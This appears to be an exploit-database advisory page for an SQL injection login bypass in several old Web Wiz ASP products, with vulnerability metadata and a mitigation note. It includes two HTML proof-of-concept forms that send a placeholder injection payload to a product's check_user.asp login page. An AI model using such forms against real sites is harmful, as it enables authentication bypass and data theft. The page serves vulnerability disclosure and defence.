header-logo
Suggest Exploit
vendor:
Multiple Products by Web Wiz
by:
devil_box
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Multiple Products by Web Wiz
Affected Version From: Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:web_wiz:site_news:3.06, cpe:/a:web_wiz:journal:1.0, cpe:/a:web_wiz:polls:3.06, cpe:/a:web_wiz:database_login:1.71
Metasploit:
Other Scripts:
Platforms Tested:

SQL injection vulnerability in Multiple Products by Web Wiz

The vulnerability allows an attacker to bypass authentication and gain unauthorized access to a site. It can also lead to disclosure or modification of data and exploitation of vulnerabilities in the underlying database implementation.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16085/info

Multiple Products by Web Wiz are prone to an SQL injection vulnerability.

Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.

Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well. 

<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>